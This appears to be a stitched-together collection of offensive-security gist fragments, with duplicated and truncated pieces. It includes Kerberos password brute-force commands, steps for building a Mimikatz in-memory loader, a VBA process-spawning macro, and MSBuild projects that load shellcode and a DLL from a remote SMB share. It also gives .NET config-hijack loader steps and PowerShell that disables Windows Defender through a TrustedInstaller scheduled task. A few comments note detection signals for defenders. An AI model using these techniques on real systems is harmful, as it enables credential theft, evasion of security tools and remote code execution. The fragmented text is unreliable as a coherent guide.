With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With the Rubeus version that includes the brute module:
With kerbrute.py:
python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>
With the Rubeus version that includes the brute module:
1. Download the latest release of mimikatz: https://github.com/gentilkiwi/mimikatz/releases | |
2. Get Mimikatz PE Loader from https://gist.github.com/pljoel/42dae5e56a86a43612bea6961cb59d1a | |
3. Use the katz.cs file from @pljoel, uncomment the build lines in Delivery.Program.Main() and comment out the Exec() line.
4. Build it to generate file.b64, copy its contents and use them to replace the Package.file string in payload.txt.
6. Make sure the payloadPath variable is set correctly in "TestAssemblyLoader.cs".
typedef interface IEditionUpgradeManager IEditionUpgradeManager; | |
typedef struct IEditionUpgradeManagerVtbl { | |
BEGIN_INTERFACE | |
HRESULT(STDMETHODCALLTYPE *QueryInterface)( | |
__RPC__in IEditionUpgradeManager * This, | |
__RPC__in REFIID riid, |
' POC to spawn process with PROCESS_CREATION_MITIGATION_POLICY_BLOCK_NON_MICROSOFT_BINARIES_ALWAYS_ON mitigation enabled | |
' by @_xpn_ | |
' | |
' Thanks to https://github.com/itm4n/VBA-RunPE and https://github.com/christophetd/spoofing-office-macro | |
' Win32 constants used by the POC; values match the public Windows SDK headers.
' CreateProcess dwCreationFlags bit: lpStartupInfo points to a STARTUPINFOEX, which carries
' the process/thread attribute list (needed to pass the mitigation policy attribute).
Const EXTENDED_STARTUPINFO_PRESENT = &H80000 | |
' HeapAlloc flag: returned memory is zero-initialised.
Const HEAP_ZERO_MEMORY = &H8& | |
' ShowWindow value for STARTUPINFO.wShowWindow: the new process window is not shown.
Const SW_HIDE = &H0& | |
' Maximum length of a Windows path buffer (characters, including the terminator).
Const MAX_PATH = 260 | |
' UpdateProcThreadAttribute attribute id (ProcThreadAttributeMitigationPolicy = 7,
' OR'ed with PROC_THREAD_ATTRIBUTE_INPUT = &H20000). The policy value itself is set
' later in the script, outside this fragment. Detection note: a process created with a
' mitigation-policy attribute by a non-standard parent is unusual and worth logging.
Const PROC_THREAD_ATTRIBUTE_MITIGATION_POLICY = &H20007
I hereby claim:
To claim this, I am signing this object:
<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<!-- Single target: runs the inline SimpleTask once with the three parameters below.
     MyCode is a placeholder for a base64 payload; what the task does with MyCode and
     MyProcess is defined in the task assembly, which is not part of this file. -->
<Target Name="MyTarget"> | |
<SimpleTask MyProperty="My voice is my passport." | |
MyCode='<base64 encoded x64 shellcode>' | |
MyProcess='C:\Program Files\Internet Explorer\iexplore.exe'/> | |
</Target> | |
<!-- UsingTask resolves the task implementation from a UNC path, so MSBuild loads a DLL
     fetched over SMB at build time. Detection note: msbuild.exe reading a task assembly
     from a remote share (network/SMB read followed by an in-process image load) is a
     high-signal event for defenders. -->
<UsingTask TaskName="SimpleTask" AssemblyFile="\\192.168.120.129\share\IEShims.dll" /> | |
</Project> | |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003" > | |
<Target Name="Hello" > | |
<!-- Call ANY .NET API --> | |
<!-- | |
Author: Casey Smith, Twitter: @subTee | |
License: BSD 3-Clause | |
GhostLoader Steps :)
1. Create C:\Tools
2. Copy some .NET binary (any .NET binary will do) to C:\Tools
3. In this example, we use FileHistory.exe, but any .NET app will do.
4. Ensure FileHistory.exe.config is in the same path
5. Execute C:\Tools\FileHistory.exe
$cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
$a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
$svc = New-Object -ComObject 'Schedule.Service' | |
$svc.Connect() | |
$user = 'NT SERVICE\TrustedInstaller' | |
$folder = $svc.GetFolder('\') |